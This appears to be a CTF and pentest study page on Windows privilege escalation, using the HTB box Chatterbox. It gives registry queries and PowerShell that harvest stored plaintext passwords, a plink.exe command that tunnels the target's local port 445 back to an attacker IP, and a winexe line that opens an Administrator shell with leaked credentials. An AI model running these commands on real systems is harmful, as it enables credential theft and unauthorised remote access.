# Stored Passwords and Port Forwarding

## Overview

Credentials can be stored in the **registry**, and some ports on the machine are only reachable from the inside (the box itself), not from the network.

What if the user we landed on **is** an Administrator but just needs to provide credentials to execute commands as system?

## Registry Passwords

```powershell
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

```powershell
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
```

### Example output

<figure><img src="/files/EkGL9BCwIJIqfw1bm8KH" alt=""><figcaption><p>HTB Machine Chatterbox</p></figcaption></figure>
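The two `reg query` commands above do a text match on the whole hive; the following PowerShell is an added example (not from the original page) that does the same search for string values whose name or data contains `password`, and then reads the Winlogon keys specifically, reporting whether `DefaultPassword` is populated. The function names and the default roots (`HKLM:\SOFTWARE`, `HKCU:\SOFTWARE`) are this example's own choices; it skips keys it lacks rights to open.

```powershell
# Added example (not from the original page): audit the registry for plaintext
# credentials in string value names or data, then check the Winlogon
# auto-logon values. Keys that cannot be opened are skipped silently.

function Find-RegistryPasswordValues {
    param(
        # Roots to walk; narrowed to SOFTWARE to keep the walk quick (assumption)
        [string[]]$Roots = @('HKLM:\SOFTWARE', 'HKCU:\SOFTWARE'),
        # Case-insensitive match, like `reg query /f password`
        [string]$Pattern = 'password'
    )

    foreach ($root in $Roots) {
        Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue |
            ForEach-Object {
                $key = $_
                foreach ($name in $key.GetValueNames()) {
                    # Only REG_SZ values, like `reg query /t REG_SZ`
                    if ($key.GetValueKind($name) -ne 'String') { continue }
                    $data = [string]$key.GetValue($name)
                    if ($name -match $Pattern -or $data -match $Pattern) {
                        [pscustomobject]@{
                            Key   = $key.Name
                            Value = $name
                            Data  = $data
                        }
                    }
                }
            }
    }
}

function Get-WinlogonAutoLogon {
    $path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $wl = Get-ItemProperty -Path $path -ErrorAction SilentlyContinue
    [pscustomobject]@{
        AutoAdminLogon     = $wl.AutoAdminLogon
        DefaultUserName    = $wl.DefaultUserName
        DefaultDomainName  = $wl.DefaultDomainName
        # A populated DefaultPassword is a plaintext credential in a key that
        # standard users can read; it should be removed, not left in place.
        DefaultPasswordSet = -not [string]::IsNullOrEmpty($wl.DefaultPassword)
    }
}

Find-RegistryPasswordValues | Format-Table -AutoSize
Get-WinlogonAutoLogon
```

Run it in an elevated session to cover the `HKLM` subtrees that are not readable by standard users; hits under `HKCU` show what the current user's own profile leaks. Widening `$Roots` to `HKLM:\` and `HKCU:\` gives the same coverage as the `/s` queries above, at the cost of a much longer walk.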

## Port Forwarding

```powershell
netstat -ano
```

<figure><img src="/files/JR4nRQU0WyY1i8Laz2s0" alt=""><figcaption><p>HTB Machine Chatterbox</p></figcaption></figure>
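To read the `netstat -ano` output more easily, the following PowerShell is an added example (not from the original page) that lists every listening TCP port with its owning process name and flags the ones bound only to loopback, which are the services that can never be reached from the network and are the natural candidates for a port forward. The function name is this example's own; it assumes the `Get-NetTCPConnection` cmdlet (Windows 8 / Server 2012 and later). Note that a service bound to `0.0.0.0` can still be unreachable from outside because of a host firewall rule, so the `LoopbackOnly` column explains only the binding case; compare the list against what you can actually reach from your own box.

```powershell
# Added example (not from the original page): listening TCP ports with process
# names, plus a flag for ports that only exist on 127.0.0.1 / ::1.
# Assumes the NetTCPIP module (Get-NetTCPConnection) is available.

function Get-ListeningPorts {
    $listeners = Get-NetTCPConnection -State Listen -ErrorAction Stop

    # Ports that also have a listener on the wildcard address are reachable
    # from the network (absent a firewall rule blocking them).
    $wildcardPorts = $listeners |
        Where-Object { $_.LocalAddress -in @('0.0.0.0', '::') } |
        Select-Object -ExpandProperty LocalPort -Unique

    foreach ($l in $listeners) {
        # Map the owning PID to a process name, as netstat -ano leaves to the reader
        $proc = Get-Process -Id $l.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{
            LocalAddress = $l.LocalAddress
            LocalPort    = $l.LocalPort
            PID          = $l.OwningProcess
            Process      = if ($proc) { $proc.ProcessName } else { '<unknown>' }
            # True only when the port is bound to loopback and nowhere else
            LoopbackOnly = ($l.LocalAddress -in @('127.0.0.1', '::1')) -and
                           ($l.LocalPort -notin $wildcardPorts)
        }
    }
}

Get-ListeningPorts | Sort-Object LocalPort | Format-Table -AutoSize
```

Anything marked `LoopbackOnly`, or listening on the wildcard address but not answering from your box, is what the plink forward below is for.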

[Plink](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) is a command-line SSH and Telnet client which lets us set up a port forward from the machine.

Upload and run **plink.exe** on the target so that it SSHes back to your machine and opens a remote forward: port 445 on your attacker machine is forwarded to 127.0.0.1:445 on the target, so the local-only port 445 becomes reachable from your side.

```powershell
plink.exe -l root -pw rootpasswd -R 445:127.0.0.1:445 10.10.14.10
```

The SSH session from the target lands in a shell on your own attacker machine (box inception), with the forward active for as long as that session stays open.

Use **winexe** from your attacker machine to start a shell as Administrator over the port-forwarded connection:

```bash
winexe -U Administrator%Welcome1 //127.0.0.1 cmd.exe
```

{% hint style="info" %}
If there's a credential being leaked in a **CTF** environment, chances are it leads to something else, so don't disregard it.
{% endhint %}

{% embed url="https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html" %}

